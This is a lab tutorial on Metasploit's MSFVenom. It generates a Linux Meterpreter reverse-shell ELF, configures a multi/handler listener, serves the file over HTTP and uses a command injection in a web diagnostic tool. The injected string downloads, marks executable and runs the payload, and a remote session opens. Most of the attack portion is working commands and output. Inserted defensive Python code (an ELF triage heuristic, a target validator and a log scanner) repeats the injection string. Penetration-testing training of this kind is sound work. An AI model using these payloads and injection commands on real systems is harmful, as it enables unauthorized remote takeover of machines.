MSFVenom is a command-line tool in the Metasploit Framework used to generate and customize malicious payloads. It offers parameters for tailoring the payload, including the target platform, architecture, payload type and output format, so the same tool can produce malware that works in different environments and serves different attack purposes.
In this course, a piece of malware is generated with the MSFVenom tool, transferred to the target machine through a command injection vulnerability, and used to open a remote connection back to Metasploit's listener.
Let's start by familiarizing ourselves with the MSFVenom tool.
root@xh7dqx5tsk-student:/# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>      List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>   Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options                List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>    Output format (use --list formats to list)
    -e, --encoder         <encoder>   The Encoder to use (use --list Encoders to list)
        --service-name    <value>     The service name to use when generating a service binary
        --sec-name        <value>     The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                    Generate the smallest possible payload using all available Encoders
        --encrypt         <value>     The type of Encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>     A key to be used for --encrypt
        --encrypt-iv      <value>     An initialization vector for --encrypt
    -a, --arch            <arch>      The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform>  The platform for --payload (use --list platforms to list)
    -o, --out             <path>      Save the payload to a file
    -b, --bad-chars       <list>      Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>    Prepend a nopsled of [length] size on to the payload
        --pad-nops                    Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>    The maximum size of the resulting payload
        --encoder-space   <length>    The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>     The number of times to encode the payload
    -c, --add-code        <path>      Specify an additional win32 shellcode file to include
    -x, --template        <path>      Specify a custom executable file to use as a template
    -k, --keep                        Preserve the --template behavior and inject the payload as a new thread
    -v, --var-name        <value>     Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>    The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                        Show this message
root@xh7dqx5tsk-student:/#
MSFVenom supports a wide range of payloads, formats, platforms and so on. The tool may look complicated, but it is not. Let's start by listing the payloads that msfvenom supports with the command msfvenom -l payloads.
...
windows/meterpreter/bind_hidden_tcp           Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/meterpreter/bind_ipv6_tcp             Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)
windows/meterpreter/bind_ipv6_tcp_uuid        Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/meterpreter/bind_named_pipe           Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)
windows/meterpreter/bind_nonx_tcp             Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)
windows/meterpreter/bind_tcp                  Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)
windows/meterpreter/bind_tcp_rc4              Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection
windows/meterpreter/bind_tcp_uuid             Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x86)
windows/meterpreter/find_tag                  Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection
windows/meterpreter/reverse_hop_http          Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/meterpreter/reverse_http              Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)
windows/meterpreter/reverse_http_proxy_pstore Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP
windows/meterpreter/reverse_https             Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)
windows/meterpreter/reverse_https_proxy       Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support
windows/meterpreter/reverse_ipv6_tcp          Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6
windows/meterpreter/reverse_named_pipe        Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot
windows/meterpreter/reverse_nonx_tcp          Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (No NX)
windows/meterpreter/reverse_ord_tcp           Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker
windows/meterpreter/reverse_tcp               Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker
...
As the listing shows, there are a great many of them, varying by platform and by the purpose of the attack. Sometimes you may want a full remote-administration connection; at other times you may want a VNC connection to the system, for example. There are many possible motives and correspondingly many payload types. Next, let's list the output formats that msfvenom supports.
root@xh7dqx5tsk-student:/# msfvenom -l formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
go
golang
hex
java
js_be
js_le
masm
nim
nimlang
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
rust
rustlang
sh
vbapplication
vbscript
root@xh7dqx5tsk-student:/#
The listing above shows how many output formats and coding/scripting languages the tool can produce malware in. The choice again depends entirely on the situation: is the target a Windows, Linux or OS X machine, or perhaps a website?
Feel free to try the different formats and explore the MSFVenom tool. Next, let's create a practice piece of malware that opens a Meterpreter reverse shell to our Kali machine on port 6000.
root@xozrx14hxh-student:/# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.12.51 LPORT=6000 -f elf -o meterpreter-6000.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No Encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: meterpreter-6000.so
root@xozrx14hxh-student:/#
- -p specifies the payload type.
- LHOST is the IP address the malware connects back to, i.e. the address of our own listening machine.
- LPORT is the port it connects to.
- -f specifies the output format.
- -o specifies the file in which the generated payload is saved.
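As an added defensive example (not part of the course material): the sizes printed above (130-byte payload, 250-byte file) are consistent with a bare ELF64 layout of a 64-byte ELF header, one 56-byte program header and the payload, with no section table. The Python below, written for this page, parses that layout so a triage script can flag such headers-only binaries; the sample ELF it builds is constructed inline with a 130-byte NOP body (not the page's payload), and the "bare dropper" heuristic and its size threshold are this example's own assumptions.

```python
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT, PHDR_FMT = "<HHIQQQIHHHHHH", "<IIQQQQQQ"  # ELF64 header (after e_ident) and program header

def triage_elf64(data: bytes) -> dict:
    """Parse the ELF64 header and program headers and return triage indicators."""
    if len(data) < 64 or data[:4] != ELF_MAGIC or data[4] != 2:  # EI_CLASS 2 = 64-bit
        return {"elf64": False}
    (_, _, _, e_entry, e_phoff, e_shoff, _, _, e_phentsize,
     e_phnum, _, e_shnum, _) = struct.unpack_from(EHDR_FMT, data, 16)
    # Each program header: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
    segs = [struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize) for i in range(e_phnum)]
    loads = [s for s in segs if s[0] == PT_LOAD]
    rwx = [s for s in loads if s[1] & PF_X and s[1] & PF_W]
    # File offset of the entry point: entry - p_vaddr + p_offset of the segment that maps it
    entry_off = next((e_entry - s[3] + s[2] for s in loads if s[3] <= e_entry < s[3] + s[6]), None)
    return {
        "elf64": True,
        "size": len(data),
        "no_section_table": e_shoff == 0 and e_shnum == 0,
        "single_rwx_load": len(segs) == 1 and len(rwx) == 1,
        "entry_follows_headers": entry_off == 64 + e_phnum * e_phentsize,
        "payload_bytes": None if entry_off is None else len(data) - entry_off,
    }

def looks_like_bare_dropper(ind: dict, max_size: int = 4096) -> bool:
    """Heuristic verdict (this example's assumption): tiny, no section table,
    a single RWX segment and the entry point right after the headers."""
    return bool(ind.get("elf64") and ind["size"] <= max_size and ind["no_section_table"]
                and ind["single_rwx_load"] and ind["entry_follows_headers"])

def build_minimal_elf64(code: bytes, base: int = 0x400000) -> bytes:
    """Constructed sample: 64-byte ELF header + one RWX PT_LOAD header + code, no sections."""
    code_off = 64 + 56
    total = code_off + len(code)
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, little-endian, version 1, SYSV ABI
    ehdr = e_ident + struct.pack(EHDR_FMT, 2, 62, 1, base + code_off, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack(PHDR_FMT, PT_LOAD, PF_R | PF_W | PF_X, 0, base, base, total, total, 0x1000)
    return ehdr + phdr + code

# Constructed stand-in for the page's 130-byte payload: plain NOPs, not shellcode.
SAMPLE = build_minimal_elf64(b"\x90" * 130)

if __name__ == "__main__":
    ind = triage_elf64(SAMPLE)
    print(ind, "->", "bare dropper" if looks_like_bare_dropper(ind) else "not flagged")
```

Run against a file dropped on a host, the same indicators separate a headers-only stager from a normally linked binary, which carries a section table and several segments.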
Next, we open the target's web service and look for the command injection vulnerability in it, which is in the web diagnostic tool.


We can exploit this vulnerability to transfer our malware to the target machine, then execute the program through the same command injection and gain remote control of the machine. First, however, we need to set up our own Kali machine to listen for the remote connection that the malware creates. Let's start msfconsole.
root@xh7dqx5tsk-student:/# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ Metasploit v6.3.31-dev ]
+ -- --=[ 2346 Exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1387 payloads - 46 Encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View all productivity tips with the
tips command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
Multi/handler acts as a server that waits for and accepts connections from target systems. When the payload is executed on the target system, it connects back to multi/handler, which completes the session and gives the attacker remote access to or control of the system.
Multi/handler is especially useful within Metasploit because it pairs with many different attack modules, letting the attacker choose how to exploit a vulnerability depending on the situation and the target system.
You select multi/handler as a module with the use command, as shown above. Let's check its settings and configure them correctly: we need to select the appropriate Meterpreter payload type and set the network settings.
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
Payload options (generic/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listening port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.12.254
LHOST => 10.0.12.254
msf6 exploit(multi/handler) > set LPORT 6000
LPORT => 6000
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.12.254      yes       The listen address (an interface may be specified)
   LPORT  6000             yes       The listening port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) >
Then execute the run command to start listening.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.12.254:6000
Next, we need to transfer the malware we generated to the target machine and execute it, as follows.
First, let's start an HTTP server to serve the payload.
root@xh7dqx5tsk-student:/# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Then we use the following command injection, which downloads our malware, makes it executable and runs it.
8.8.8.8 | wget http://10.0.12.51:8000/meterpreter-6000.so && chmod +x meterpreter-6000.so && ./meterpreter-6000.so
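As an added example for the defending side (not from the course): the Python below validates a diagnostic-tool target so that only an IP literal or a hostname can ever reach the ping command, and scans web access logs for the kind of injected target shown above. The endpoint path /diagnostic, the parameter name host, the log format and the sample log lines are all constructed for this example; the page names none of them.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Prevention side: the only acceptable diagnostic targets are an IP literal or a plain hostname.
HOSTNAME_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))*\.?$", re.I)
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
FETCH_AND_RUN = re.compile(r"\b(wget|curl)\b.*(\bchmod\b|\bsh\b|\bbash\b|\./)", re.I)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')  # common log format

def validate_target(value: str):
    """Return the normalised host if `value` is an IP address or hostname, otherwise None."""
    v = value.strip()
    try:
        return str(ipaddress.ip_address(v))
    except ValueError:
        return v.lower() if HOSTNAME_RE.match(v) else None

def classify_target(value: str) -> str:
    """Label one submitted (already URL-decoded) target."""
    if validate_target(value):
        return "ok"
    if FETCH_AND_RUN.search(value):
        return "fetch-and-execute"
    if SHELL_META.search(value):
        return "shell-metacharacters"
    return "invalid"

def scan_access_log(lines, path="/diagnostic", param="host"):
    """Detection side: (client, verdict, decoded target) for every request to `path` whose target is not clean.
    The endpoint and parameter names are assumptions of this example."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(2))
        if url.path != path:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_target(value)
            if verdict != "ok":
                findings.append((m.group(1), verdict, value))
    return findings

# Constructed sample log: one benign lookup, then the page's injection string URL-encoded.
SAMPLE_LOG = [
    '10.0.12.20 - - [16/Oct/2023:14:55:10 +0000] "GET /diagnostic?host=8.8.8.8 HTTP/1.1" 200 412',
    '10.0.12.51 - - [16/Oct/2023:14:57:05 +0000] "GET /diagnostic?host=8.8.8.8+%7C+wget+http%3A%2F%2F10.0.12.51%3A8000%2Fmeterpreter-6000.so+%26%26+chmod+%2Bx+meterpreter-6000.so+%26%26+.%2Fmeterpreter-6000.so HTTP/1.1" 200 0',
]
```

A web application that passes only the value returned by validate_target to ping, as an argument list rather than a shell string, has no command injection to find; scan_access_log is what you run over existing logs to see whether anyone has already tried.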

Now a Meterpreter command-line session to the target should open in our listener.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.12.51:6000
[*] Sending stage (3045380 bytes) to 10.0.12.85
[*] Meterpreter session 1 opened (10.0.12.51:6000 -> 10.0.12.85:40476) at 2023-10-16 14:57:09 +0000
meterpreter >
The MSFVenom tool and multi/handler are perhaps the most commonly used components of the entire Metasploit suite, thanks to their versatility and usefulness.

